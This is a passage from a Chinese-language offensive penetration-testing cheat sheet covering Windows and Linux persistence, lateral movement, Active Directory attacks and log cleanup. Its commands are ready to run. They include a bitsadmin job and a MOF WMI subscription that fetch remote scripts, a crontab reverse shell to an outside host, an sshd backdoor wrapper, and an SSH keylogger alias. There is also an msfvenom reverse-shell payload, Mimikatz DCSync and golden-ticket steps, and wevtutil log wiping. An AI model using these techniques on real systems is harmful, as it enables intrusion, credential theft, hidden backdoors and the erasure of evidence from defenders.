NT\CurrentVersion\Winlogon ``` ##### 6. Startup Keys ``` HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders ``` ##### 7. Services 创建服务 ``` sc create [ServerName] binPath= BinaryPathName ``` ##### 8. Browser Helper Objects 本质上是Internet Explorer启动时加载的DLL模块 ``` HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects ``` ##### 9. AppInit_DLLs 加载User32.dll会加载的DLL ``` HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs ``` ##### 10. 文件关联 ``` HKEY_LOCAL_MACHINE\Software\Classes HKEY_CLASSES_ROOT ``` ##### 11. [bitsadmin](http://www.liuhaihua.cn/archives/357579.html) ``` bitsadmin /create backdoor bitsadmin /addfile backdoor %comspec% %temp%\cmd.exe bitsadmin.exe /SetNotifyCmdLine backdoor regsvr32.exe "/u /s /i:https://host.com/calc.sct scrobj.dll" bitsadmin /Resume backdoor ``` ##### 12. [mof ](https://evi1cg.me/archives/Powershell_MOF_Backdoor.html) ``` pragma namespace("\\\\.\\root\\subscription") instance of __EventFilter 创维A20 $EventFilter { EventNamespace = "Root\\Cimv2"; Name = "filtP1"; Query = "Select * From __InstanceModificationEvent " "Where TargetInstance Isa \"Win32_LocalTime\" " "And TargetInstance.Second = 1"; QueryLanguage = "WQL"; }; instance of ActiveScriptEventConsumer 创维A20 $Consumer { Name = "consP1"; ScriptingEngine = "JScript"; ScriptText = "GetObject(\"script:https://host.com/test\")"; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; }; ``` 管理员执行: ``` mofcomp test.mof ``` ##### 13. [wmi](https://3gstudent.github.io/3gstudent.github.io/Study-Notes-of-WMI-Persistence-using-wmic.exe/) 每隔60秒执行一次notepad.exe ``` wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="BotFilter82", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'" wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="BotConsumer23", ExecutablePath="C:\Windows\System32\notepad.exe",CommandLineTemplate="C:\Windows\System32\notepad.exe" wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name=\"BotFilter82\"", Consumer="CommandLineEventConsumer.Name=\"BotConsumer23\"" ``` ##### 14. [Userland Persistence With Scheduled Tasks](https://3gstudent.github.io/3gstudent.github.io/Userland-registry-hijacking/) 劫持计划任务UserTask,在系统启动时加载dll ``` function Invoke-ScheduledTaskComHandlerUserTask { [CmdletBinding(SupportsShouldProcess = $True, ConfirmImpact = 'Medium')] Param ( [Parameter(Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $Command, [Switch] $Force ) $ScheduledTaskCommandPath = "HKCU:\Software\Classes\CLSID\{58fb76b9-ac85-4e55-ac04-427593b1d060}\InprocServer32" if ($Force -or ((Get-ItemProperty -Path $ScheduledTaskCommandPath -Name '(default)' -ErrorAction SilentlyContinue) -eq $null)){ New-Item $ScheduledTaskCommandPath -Force | New-ItemProperty -Name '(Default)' -Value $Command -PropertyType string -Force | Out-Null }else{ Write-Verbose "Key already exists, consider using -Force" exit } if (Test-Path $ScheduledTaskCommandPath) { Write-Verbose "Created registry entries to hijack the UserTask" }else{ Write-Warning "Failed to create registry key, exiting" exit } } Invoke-ScheduledTaskComHandlerUserTask -Command "C:\test\testmsg.dll" -Verbose ``` ##### 15. [Netsh](https://3gstudent.github.io/3gstudent.github.io/Netsh-persistence/) ``` netsh add helper c:\test\netshtest.dll ``` 后门触发:每次调用netsh >dll编写:https://github.com/outflanknl/NetshHelperBeacon ##### 16. [Shim](https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E4%B8%AD%E7%9A%84Application-Compatibility-Shims/) 常用方式: InjectDll RedirectShortcut RedirectEXE ##### 17. [DLL劫持](https://3gstudent.github.io/3gstudent.github.io/DLL%E5%8A%AB%E6%8C%81%E6%BC%8F%E6%B4%9E%E8%87%AA%E5%8A%A8%E5%8C%96%E8%AF%86%E5%88%AB%E5%B7%A5%E5%85%B7Rattler%E6%B5%8B%E8%AF%95/) 通过Rattler自动枚举进程,检测是否存在可用dll劫持利用的进程 使用:Procmon半自动测试更精准,常规生成的dll会导致程序执行报错或中断,使用AheadLib配合生成dll劫持利用源码不会影响程序执行 工具:https://github.com/sensepost/rattler 工具:https://github.com/Yonsm/AheadLib ##### 18. [DoubleAgent ](https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E4%B8%AD%E7%9A%84Application-Verifier(DoubleAgent%E5%88%A9%E7%94%A8%E4%BB%8B%E7%BB%8D)/) 编写自定义Verifier provider DLL 通过Application Verifier进行安装 注入到目标进程执行payload 每当目标进程启动,均会执行payload,相当于一个自启动的方式 POC : https://github.com/Cybellum/DoubleAgent ##### 19. [waitfor.exe ](https://3gstudent.github.io/3gstudent.github.io/Use-Waitfor.exe-to-maintain-persistence/) 不支持自启动,但可远程主动激活,后台进程显示为waitfor.exe POC : https://github.com/3gstudent/Waitfor-Persistence ##### 20. [AppDomainManager](https://3gstudent.github.io/3gstudent.github.io/Use-AppDomainManager-to-maintain-persistence/) 针对.Net程序,通过修改AppDomainManager能够劫持.Net程序的启动过程。如果劫持了系统常见.Net程序如powershell.exe的启动过程,向其添加payload,就能实现一种被动的后门触发机制 ##### 21. Office [劫持Office软件的特定功能](https://3gstudent.github.io/3gstudent.github.io/%E5%88%A9%E7%94%A8BDF%E5%90%91DLL%E6%96%87%E4%BB%B6%E6%A4%8D%E5%85%A5%E5%90%8E%E9%97%A8/):通过dll劫持,在Office软件执行特定功能时触发后门 [利用VSTO实现的office后门](https://3gstudent.github.io/3gstudent.github.io/%E5%88%A9%E7%94%A8VSTO%E5%AE%9E%E7%8E%B0%E7%9A%84office%E5%90%8E%E9%97%A8/) [Office加载项](https://github.com/3gstudent/Office-Persistence) * Word WLL * Excel XLL * Excel VBA add-ins * PowerPoint VBA add-ins >参考1 :https://3gstudent.github.io/3gstudent.github.io/Use-Office-to-maintain-persistence/ >参考2 :https://3gstudent.github.io/3gstudent.github.io/Office-Persistence-on-x64-operating-system/ ##### 22. [CLR](https://3gstudent.github.io/3gstudent.github.io/Use-CLR-to-maintain-persistence/) 无需管理员权限的后门,并能够劫持所有.Net程序 POC:https://github.com/3gstudent/CLR-Injection ##### 23. [msdtc](https://3gstudent.github.io/3gstudent.github.io/Use-msdtc-to-maintain-persistence/) 利用MSDTC服务加载dll,实现自启动,并绕过Autoruns对启动项的检测 利用:向 %windir%\system32\目录添加dll并重命名为oci.dll ##### 24. [Hijack CAccPropServicesClass and MMDeviceEnumerato](https://3gstudent.github.io/3gstudent.github.io/Use-COM-Object-hijacking-to-maintain-persistence-Hijack-CAccPropServicesClass-and-MMDeviceEnumerator/) 利用COM组件,不需要重启系统,不需要管理员权限 通过修改注册表实现 POC:https://github.com/3gstudent/COM-Object-hijacking ##### 25. [Hijack explorer.exe](https://3gstudent.github.io/3gstudent.github.io/Use-COM-Object-hijacking-to-maintain-persistence-Hijack-explorer.exe/) COM组件劫持,不需要重启系统,不需要管理员权限 通过修改注册表实现 ``` HKCU\Software\Classes\CLSID{42aedc87-2188-41fd-b9a3-0c966feabec1} HKCU\Software\Classes\CLSID{fbeb8a05-beee-4442-804e-409d6c4515e9} HKCU\Software\Classes\CLSID{b5f8350b-0548-48b1-a6ee-88bd00b4a5e7} HKCU\Software\Classes\Wow6432Node\CLSID{BCDE0395-E52F-467C-8E3D-C4579291692E} ``` ##### 26. Windows FAX DLL Injection 通过DLL劫持,劫持Explorer.exe对`fxsst.dll`的加载 Explorer.exe在启动时会加载`c:\Windows\System32\fxsst.dll`(服务默认开启,用于传真服务)将payload.dll保存在`c:\Windows\fxsst.dll`,能够实现dll劫持,劫持Explorer.exe对`fxsst.dll`的加载 ##### 27. 特殊注册表键值 在注册表启动项创建特殊名称的注册表键值,用户正常情况下无法读取(使用Win32 API),但系统能够执行(使用Native API)。 [《渗透技巧——"隐藏"注册表的创建》](https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-%E9%9A%90%E8%97%8F-%E6%B3%A8%E5%86%8C%E8%A1%A8%E7%9A%84%E5%88%9B%E5%BB%BA/) [《渗透技巧——"隐藏"注册表的更多测试》](https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-%E9%9A%90%E8%97%8F-%E6%B3%A8%E5%86%8C%E8%A1%A8%E7%9A%84%E6%9B%B4%E5%A4%9A%E6%B5%8B%E8%AF%95/) ##### 28. 快捷方式后门 替换我的电脑快捷方式启动参数 POC : https://github.com/Ridter/Pentest/blob/master/powershell/MyShell/Backdoor/LNK_backdoor.ps1 ##### 29. [Logon Scripts](https://3gstudent.github.io/3gstudent.github.io/Use-Logon-Scripts-to-maintain-persistence/) ``` New-ItemProperty "HKCU:\Environment\" UserInitMprLogonScript -value "c:\test\11.bat" -propertyType string | Out-Null ``` ##### 30. [Password Filter DLL](https://3gstudent.github.io/3gstudent.github.io/Password-Filter-DLL%E5%9C%A8%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E4%B8%AD%E7%9A%84%E5%BA%94%E7%94%A8/) ##### 31. [利用BHO实现IE浏览器劫持](https://3gstudent.github.io/3gstudent.github.io/%E5%88%A9%E7%94%A8BHO%E5%AE%9E%E7%8E%B0IE%E6%B5%8F%E8%A7%88%E5%99%A8%E5%8A%AB%E6%8C%81/) ##### 32. [SharPersist](https://github.com/fireeye/SharPersist/wiki) #### Linux ##### crontab 每60分钟反弹一次shell给dns.wuyun.org的53端口 ``` #!bash (crontab -l;printf "*/60 * * * * exec 9<> /dev/tcp/dns.wuyun.org/53;exec 0<&9;exec 1>&9 2>&1;/bin/bash --noprofile -i;\rno crontab for `whoami`%100c\n")|crontab - ``` 在dns.wuyun.org的vps上可以使用[Platypus](https://github.com/WangYihang/Platypus)来对反弹的shell进行管理 ##### 硬链接sshd ``` #!bash ln -sf /usr/sbin/sshd /tmp/su; /tmp/su -oPort=2333; ``` 链接:ssh root@192.168.206.142 -p 2333 ##### SSH Server wrapper ``` #!bash cd /usr/sbin mv sshd ../bin echo '#!/usr/bin/perl' >sshd echo 'exec "/bin/sh" if (getpeername(STDIN) =~ /^..4A/);' >>sshd echo 'exec {"/usr/bin/sshd"} "/usr/sbin/sshd",@ARGV,' >>sshd chmod u+x sshd //不用重启也行 /etc/init.d/sshd restart ``` ``` socat STDIO TCP4:192.168.206.142:22,sourceport=13377 ``` ##### SSH keylogger vim当前用户下的.bashrc文件,末尾添加 ``` #!bash alias ssh='strace -o /tmp/sshpwd-`date '+%d%h%m%s'`.log -e read,write,connect -s2048 ssh' ``` source .bashrc ##### Cymothoa_进程注入backdoor ``` ./cymothoa -p 2270 -s 1 -y 7777 ``` ``` nc -vv ip 7777 ``` ##### Vegile_进程注入backdoor ```bash msfvenom -a x64 --platform linux -p linux/x64/shell/reverse_tcp LHOST=127.0.0.1 LPORT=8080 -f elf -o /tmp/backdoor ``` ```bash # 进程注入 Vegile --i /tmp/backdoor # 无限重启 Vegile --u /tmp/backdoor ``` ##### rootkit * [openssh_rootkit](http://core.ipsecs.com/rootkit/patch-to-hack/0x06-openssh-5.9p1.patch.tar.gz) * [Kbeast_rootkit ](http://core.ipsecs.com/rootkit/kernel-rootkit/ipsecs-kbeast-v1.tar.gz) * Mafix + Suterusu rootkit ##### Tools * [Vegile ](https://github.com/Screetsec/Vegile) * [backdoor ](https://github.com/icco/backdoor) ### WEB后门 PHP Meterpreter后门 Aspx Meterpreter后门 weevely webacoo .... ## 横向渗透 ### 端口渗透 #### 端口扫描 * 1.端口的指纹信息(版本信息) * 2.端口所对应运行的服务 * 3.常见的默认端口号 * 4.尝试弱口令 #### 端口爆破 * [hydra](https://github.com/vanhauser-thc/thc-hydra) * [Crowbar](https://github.com/galkan/crowbar) -- OpenVPN/RDP/SSH/VNC * [PortBrute](https://github.com/awake1t/PortBrute) -- 爆破FTP/SSH/SMB/MSSQL/MYSQL/POSTGRESQL/MONGOD (Go语言编写,跨平台支持) #### 端口弱口令 * NTScan * Hscan * 自写脚本 #### 端口溢出 **smb** * ms08067 * ms17010 * ms11058 * ... **apache** **ftp** **...** #### 常见的默认端口 ##### 1. web类(web漏洞/敏感目录) 第三方通用组件漏洞: struts thinkphp jboss ganglia zabbix ... ``` 80 web 80-89 web 8000-9090 web ``` ##### 2. 数据库类(扫描弱口令) ``` 1433 MSSQL 1521 Oracle 3306 MySQL 5432 PostgreSQL 50000 DB2 ``` ##### 3. 特殊服务类(未授权/命令执行类/漏洞) ``` 443 SSL心脏滴血 445 ms08067/ms11058/ms17010等 873 Rsync未授权 5984 CouchDB http://xxx:5984/_utils/ 6379 redis未授权 7001,7002 WebLogic默认弱口令,反序列 9200,9300 elasticsearch 参考WooYun: 多玩某服务器ElasticSearch命令执行漏洞 11211 memcache未授权访问 27017,27018 Mongodb未授权访问 50000 SAP命令执行 50070,50030 hadoop默认端口未授权访问 ``` ##### 4. 常用端口类(扫描弱口令/端口爆破) ``` 21 ftp 22 SSH 23 Telnet 445 SMB弱口令扫描 2601,2604 zebra路由,默认密码zebra 3389 远程桌面 5800,5801,5900,5901 VNC ``` ##### 5. 端口合计所对应的服务 ``` 21 ftp 22 SSH 23 Telnet 25 SMTP 53 DNS 69 TFTP 80 web 80-89 web 110 POP3 135 RPC 139 NETBIOS 143 IMAP 161 SNMP 389 LDAP 443 SSL心脏滴血以及一些web漏洞测试 445 SMB 512,513,514 Rexec 873 Rsync未授权 1025,111 NFS 1080 socks 1158 ORACLE EMCTL2601,2604 zebra路由,默认密码zebra案 1433 MSSQL (暴力破解) 1521 Oracle:(iSqlPlus Port:5560,7778) 2082/2083 cpanel主机管理系统登陆 (国外用较多) 2222 DA虚拟主机管理系统登陆 (国外用较多) 2601,2604 zebra路由,默认密码zebra 3128 squid代理默认端口,如果没设置口令很可能就直接漫游内网了 3306 MySQL (暴力破解) 3312/3311 kangle主机管理系统登陆 3389 远程桌面 (RDP) 3690 svn 4440 rundeck 参考WooYun: 借用新浪某服务成功漫游新浪内网 4848 GlassFish web中间件 弱口令:admin/adminadmin 5432 PostgreSQL 5900 vnc 5984 CouchDB http://xxx:5984/_utils/ 6082 varnish 参考WooYun: Varnish HTTP accelerator CLI 未授权访问易导致网站被直接篡改或者作为代理进入内网 6379 redis未授权 7001,7002 WebLogic默认弱口令,反序列 7778 Kloxo主机控制面板登录 8000-9090 都是一些常见的web端口,有些运维喜欢把管理后台开在这些非80的端口上 8080 tomcat/WDCd/ 主机管理系统,默认弱口令 8080,8089,9090 JBOSS 8081 Symantec AV/Filter for MSE 8083 Vestacp主机管理系统 (国外用较多) 8649 ganglia 8888 amh/LuManager 主机管理系统默认端口 9000 fcgi fcig php执行 9043 websphere[web中间件] 弱口令: admin/admin websphere/ websphere ststem/manager 9200,9300 elasticsearch 参考WooYun: 多玩某服务器ElasticSearch命令执行漏洞 10000 Virtualmin/Webmin 服务器虚拟主机管理系统 11211 memcache未授权访问 27017,27018 Mongodb未授权访问 28017 mongodb统计页面 50000 SAP命令执行 50060 hadoop 50070,50030 hadoop默认端口未授权访问 ``` ### 域渗透 #### 信息搜集 ##### powerview.ps1 ``` Get-NetDomain - gets the name of the current user's domain Get-NetForest - gets the forest associated with the current user's domain Get-NetForestDomains - gets all domains for the current forest Get-NetDomainControllers - gets the domain controllers for the current computer's domain Get-NetCurrentUser - gets the current [domain\]username Get-NetUser - returns all user objects, or the user specified (wildcard specifiable) Get-NetUserSPNs - gets all user ServicePrincipalNames Get-NetOUs - gets data for domain organization units Get-NetGUIDOUs - finds domain OUs linked to a specific GUID Invoke-NetUserAdd - adds a local or domain user Get-NetGroups - gets a list of all current groups in the domain Get-NetGroup - gets data for each user in a specified domain group Get-NetLocalGroups - gets a list of localgroups on a remote host or hosts Get-NetLocalGroup - gets the members of a localgroup on a remote host or hosts Get-NetLocalServices - gets a list of running services/paths on a remote host or hosts Invoke-NetGroupUserAdd - adds a user to a specified local or domain group Get-NetComputers - gets a list of all current servers in the domain Get-NetFileServers - get a list of file servers used by current domain users Get-NetShare - gets share information for a specified server Get-NetLoggedon - gets users actively logged onto a specified server Get-NetSessions - gets active sessions on a specified server Get-NetFileSessions - returned combined Get-NetSessions and Get-NetFiles Get-NetConnections - gets active connections to a specific server resource (share) Get-NetFiles - gets open files on a server Get-NetProcesses - gets the remote processes and owners on a remote server ``` ##### BloodHound **获取某OU下所有机器信息** ``` { "name": "Find the specificed OU computers", "queryList": [ { "final": false, "title": "Select a OU...", "query": "MATCH (n:OU) RETURN distinct n.name ORDER BY n.name DESC" }, { "final": true, "query": "MATCH (m:OU {name: $result}) with m MATCH p=(o:OU {objectid: m.objectid})-[r:Contains*1..]->(n:Computer) RETURN p", "allowCollapse": true, "endNode": "{}" } ] } ``` **自动标记owned用户及机器** [SyncDog](https://github.com/Lz1y/SyncDog) ##### 获取域内DNS信息 * [adidnsdump](https://github.com/dirkjanm/adidnsdump) * [域渗透——DNS记录的获取](https://3gstudent.github.io/3gstudent.github.io/%E5%9F%9F%E6%B8%97%E9%80%8F-DNS%E8%AE%B0%E5%BD%95%E7%9A%84%E8%8E%B7%E5%8F%96/) * 在DNS服务器上download所有记录之后可以使用[dns-zonefile](https://github.com/elgs/dns-zonefile)将txt导出为json结果 #### 获取域控的方法 ##### SYSVOL SYSVOL是指存储域公共文件服务器副本的共享文件夹,它们在域中所有的域控制器之间复制。 Sysvol文件夹是安装AD时创建的,它用来存放GPO. Script等信息。同时,存放在Sysvol文件夹中的信息,会复制到域中所有DC上。 相关阅读: * [寻找SYSVOL里的密码和攻击GPP(组策略偏好) ](http://www.freebuf.com/vuls/92016.html) * [Windows Server 2008 R2之四管理Sysvol文件夹 ](http://blog.51cto.com/ycrsjxy/203095) * [SYSVOL中查找密码并利用组策略首选项 ](https://adsecurity.org/?p=2288) * [利用SYSVOL还原组策略中保存的密码](https://xz.aliyun.com/t/1653) ##### MS14-068 Kerberos ``` python ms14-068.py -u 域用户@域名 -p 密码 -s 用户SID -d 域主机 ``` 利用mimikatz将工具得到的TGT_domainuser@SERVER.COM.ccache写入内存,创建缓存证书: ``` mimikatz.exe "kerberos::ptc c:TGT_darthsidious@pentest.com.ccache" exit net use k: \pentest.comc$ ``` 相关阅读 : * [Kerberos的工具包PyKEK](http://adsecurity.org/?p=676) * [深入解读MS14-068漏洞](http://www.freebuf.com/vuls/56081.html) * [Kerberos的安全漏洞](https://adsecurity.org/?p=541) ##### SPN扫描 Kerberoast可以作为一个有效的方法从Active Directory中以普通用户的身份提取服务帐户凭据,无需向目标系统发送任何数据包。 SPN是服务在使用Kerberos身份验证的网络上的唯一标识符。它由服务类,主机名和端口组成。在使用Kerberos身份验证的网络中,必须在内置计算机帐户(如NetworkService或LocalSystem)或用户帐户下为服务器注册SPN。对于内部帐户,SPN将自动进行注册。但是,如果在域用户帐户下运行服务,则必须为要使用的帐户的手动注册SPN。 SPN扫描的主要好处是,SPN扫描不需要连接到网络上的每个IP来检查服务端口,SPN通过LDAP查询向域控执行服务发现,SPN查询是Kerberos的票据行为一部分,因此比较难检测SPN扫描。 相关阅读 : * [非扫描式的SQL Server发现](https://blog.netspi.com/locate-and-attack-domain-sql-servers-without-scanning/) * [SPN扫描](https://adsecurity.org/?p=1508) * [扫描SQLServer的脚本](https://github.com/PyroTek3/PowerShell-AD-Recon) ##### Kerberos的黄金门票 在域上抓取的哈希 ``` lsadump::dcsync /domain:pentest.com /user:krbtgt ``` ``` kerberos::purge kerberos::golden /admin:administrator /domain:域 /sid:SID /krbtgt:hash值 /ticket:adinistrator.kiribi kerberos::ptt administrator.kiribi kerberos::tgt net use k: \pnet use k: \pentest.comc$ ``` 相关阅读 : * https://adsecurity.org/?p=1640 * [域服务账号破解实践](http://bobao.360.cn/learning/detail/3564.html) * [Kerberos的认证原理](https://blog.csdn.net/wulantian/article/details/42418231) * [深刻理解windows安全认证机制ntlm&Kerberos](https://klionsec.github.io/2016/08/10/ntlm-kerberos/) ##### Kerberos的银票务 黄金票据和白银票据的一些区别: Golden Ticket:伪造`TGT`,可以获取`任何Kerberos`服务权限 银票:伪造TGS,`只能访问指定的服务` 加密方式不同: Golden Ticket由`krbtgt`的hash加密 Silver Ticket由`服务账号`(通常为计算机账户)Hash加密 认证流程不同: 金票在使用的过程需要同域控通信 银票在使用的过程不需要同域控通信 相关阅读 : * [攻击者如何使用Kerberos的银票来利用系统](https://adsecurity.org/?p=2011) * [域渗透——Pass The Ticket](https://www.feiworks.com/wy/drops/%E5%9F%9F%E6%B8%97%E9%80%8F%E2%80%94%E2%80%94Pass%20The%20Ticket.pdf) ##### 域服务账号破解 与上面SPN扫描类似的原理 https://github.com/nidem/kerberoast 获取所有用作SPN的帐户 ``` setspn -T PENTEST.com -Q */* ``` 从Mimikatz的RAM中提取获得的门票 ``` kerberos::list /export ``` 用rgsrepcrack破解 ``` tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi ``` ##### 凭证盗窃 从搜集的密码里面找管理员的密码 ##### NTLM relay * [One API call away from Domain Admin](https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin/) * [privexchange](https://github.com/dirkjanm/privexchange/) * [Exchange2domain](https://github.com/ridter/exchange2domain) ##### Kerberos委派 * [Wagging-the-Dog.html](https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html) * [s4u2pwnage](https://www.harmj0y.net/blog/activedirectory/s4u2pwnage/) * [Attacking Kerberos Delegation](https://xz.aliyun.com/t/2931) * [用打印服务获取域控](https://adsecurity.org/?p=4056) * [Computer Takeover](https://www.harmj0y.net/blog/activedirectory/a-case-study-in-wagging-the-dog-computer-takeover/) * [Combining NTLM Relaying and Kerberos delegation](https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/) * [CVE-2019-1040](https://dirkjanm.io/exploiting-CVE-2019-1040-relay-vulnerabilities-for-rce-and-domain-admin/) ##### 地址解析协议 实在搞不定再搞ARP ​ #### 获取AD哈希 * 使用VSS卷影副本 * Ntdsutil中获取NTDS.DIT​​文件 * PowerShell中提取NTDS.DIT -->[Invoke-NinaCopy ](https://github.com/clymb3r/PowerShell/tree/master/Invoke-NinjaCopy) * 使用Mimikatz提取 ``` mimikatz lsadump::lsa /inject exit ``` * 使用PowerShell Mimikatz * 使用Mimikatz的DCSync 远程转储Active Directory凭证 提取 KRBTGT用户帐户的密码数据: ``` Mimikatz "privilege::debug" "lsadump::dcsync /domain:rd.adsecurity.org /user:krbtgt"exit ``` 管理员用户帐户提取密码数据: ``` Mimikatz "privilege::debug" "lsadump::dcsync /domain:rd.adsecurity.org /user:Administrator" exit ``` * NTDS.dit中提取哈希 使用esedbexport恢复以后使用ntdsxtract提取 #### AD持久化 ##### 活动目录持久性技巧 https://adsecurity.org/?p=1929 DS恢复模式密码维护 DSRM密码同步 >Windows Server 2008 需要安装KB961320补丁才支持DSRM密码同步,Windows Server 2003不支持DSRM密码同步。KB961320:https://support.microsoft.com/en-us/help/961320/a-feature-is-available-for-windows-server-2008-that-lets-you-synchroni,可参考:[巧用DSRM密码同步将域控权限持久化](http://drops.xmd5.com/static/drops/tips-9297.html) [DCshadow ](https://www.dcshadow.com/) ##### Security Support Provider 简单的理解为SSP就是一个DLL,用来实现身份认证 ``` privilege::debug misc::memssp ``` 这样就不需要重启`c:/windows/system32`可看到新生成的文件kiwissp.log ##### [SID History](https://adsecurity.org/?p=1772) SID历史记录允许另一个帐户的访问被有效地克隆到另一个帐户 ``` mimikatz "privilege::debug" "misc::addsid bobafett ADSAdministrator" ``` ##### [AdminSDHolder&SDProp ](https://adsecurity.org/?p=1906) 利用AdminSDHolder&SDProp(重新)获取域管理权限 ##### 组策略 https://adsecurity.org/?p=2716 [策略对象在持久化及横向渗透中的应用](https://www.anquanke.com/post/id/86531) ##### Hook PasswordChangeNotify http://www.vuln.cn/6812 ##### Kerberoasting后门 [域渗透-Kerberoasting](https://3gstudent.github.io/3gstudent.github.io/%E5%9F%9F%E6%B8%97%E9%80%8F-Kerberoasting/) ##### AdminSDHolder [Backdooring AdminSDHolder for Persistence](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/how-to-abuse-and-backdoor-adminsdholder-to-obtain-domain-admin-persistence) ##### Delegation [Unconstrained Domain Persistence](https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html#unconstrained-domain-persistence) #### 其他 ##### 域内主机提权 [SharpAddDomainMachine](https://github.com/Ridter/SharpAddDomainMachine ) ##### Exchange的利用 * [**Exchange2domain**](https://github.com/Ridter/Exchange2domain) * [**CVE-2018-8581**](https://github.com/WyAtu/CVE-2018-8581/) * [**CVE-2019-1040**](https://github.com/Ridter/CVE-2019-1040) * [**CVE-2020-0688**](https://github.com/Ridter/CVE-2020-0688) * [**NtlmRelayToEWS**](https://github.com/Arno0x/NtlmRelayToEWS) * [**ewsManage**](https://github.com/3gstudent/ewsManage) #### TIPS [《域渗透——Dump Clear-Text Password after KB2871997 installed》](https://github.com/3gstudent/Dump-Clear-Password-after-KB2871997-installed) [《域渗透——Hook PasswordChangeNotify》](http://www.vuln.cn/6812) >可通过Hook PasswordChangeNotify实时记录域控管理员的新密码 [《域渗透——Local Administrator Password Solution》 ](http://www.liuhaihua.cn/archives/179102.html) >域渗透时要记得留意域内主机的本地管理员账号 [《域渗透——利用SYSVOL还原组策略中保存的密码》 ](https://3gstudent.github.io/3gstudent.github.io/%E5%9F%9F%E6%B8%97%E9%80%8F-%E5%88%A9%E7%94%A8SYSVOL%E8%BF%98%E5%8E%9F%E7%BB%84%E7%AD%96%E7%95%A5%E4%B8%AD%E4%BF%9D%E5%AD%98%E7%9A%84%E5%AF%86%E7%A0%81/) #### 相关工具 * [BloodHound ](https://github.com/BloodHoundAD/BloodHound) * [CrackMapExec ](https://github.com/byt3bl33d3r/CrackMapExec) * [DeathStar](https://github.com/byt3bl33d3r/DeathStar) >利用过程:http://www.freebuf.com/sectool/160884.html ### 在远程系统上执行程序 * At * Psexec * WMIC * Wmiexec * Smbexec * Powershell remoting * DCOM * [Winrm](https://github.com/Hackplayers/evil-winrm) * [SharpWmi](https://github.com/QAX-A-Team/sharpwmi) -- 基于135端口来进行横向移动的工具,具有执行命令和上传文件功能 * [goWMIExec](https://github.com/C-Sto/goWMIExec) -- 纯golang实现,可以在linux环境下进行,不需要impacket的支持 ### IOT相关 * 1. 路由器 [routersploit ](https://github.com/reverse-shell/routersploit) * 2. 打印机 [PRET ](https://github.com/RUB-NDS/PRET) * 3. IOT exp https://www.exploitee.rs/ * 4. 相关 [OWASP-Nettacker](https://www.owasp.org/index.php/OWASP_Nettacker) [isf](https://github.com/dark-lbp/isf) [icsmaster](https://github.com/w3h/icsmaster) ### 中间人 * [Cain](http://www.oxid.it/cain.html) * [Ettercap](https://github.com/Ettercap/ettercap) * [Responder](https://github.com/SpiderLabs/Responder) * [MITMf](https://github.com/byt3bl33d3r/MITMf) * [3r/MITMf)](https://github.com/evilsocket/bettercap) ### 规避杀软及检测 #### Bypass Applocker [UltimateAppLockerByPassList ](https://github.com/api0cradle/UltimateAppLockerByPassList) https://lolbas-project.github.io/ #### bypassAV * Empire * PEspin * Shellter * Ebowla * Veil * PowerShell * Python * [代码注入技术Process Doppelgänging ](http://www.4hou.com/technology/9379.html) * [Disable-Windows-Defender](https://github.com/NYAN-x-CAT/Disable-Windows-Defender) * ... ## 痕迹清理 ### [Windows日志清除](https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-Windows%E6%97%A5%E5%BF%97%E7%9A%84%E5%88%A0%E9%99%A4%E4%B8%8E%E7%BB%95%E8%BF%87/) 获取日志分类列表: ``` wevtutil el >1.txt ``` 获取单个日志类别的统计信息: eg. ``` wevtutil gli "windows powershell" ``` 回显: ``` creationTime: 2016-11-28T06:01:37.986Z lastAccessTime: 2016-11-28T06:01:37.986Z lastWriteTime: 2017-08-08T08:01:20.979Z fileSize: 1118208 attributes: 32 numberOfLogRecords: 1228 oldestRecordNumber: 1 ``` 查看指定日志的具体内容: ``` wevtutil qe /f:text "windows powershell" ``` 删除单个日志类别的所有信息: ``` wevtutil cl "windows powershell" ``` ### 破坏Windows日志记录功能 利用工具 * [Invoke-Phant0m](https://github.com/hlldz/Invoke-Phant0m) * [Windwos-EventLog-Bypass](https://github.com/3gstudent/Windwos-EventLog-Bypass) * [Phant0m | Windows Event Log Killer]() ### msf ``` run clearlogs ``` ``` clearev ``` ### 3389登陆记录清除 ``` @echo off @reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f @del "%USERPROFILE%\My Documents\Default.rdp" /a @exit ```
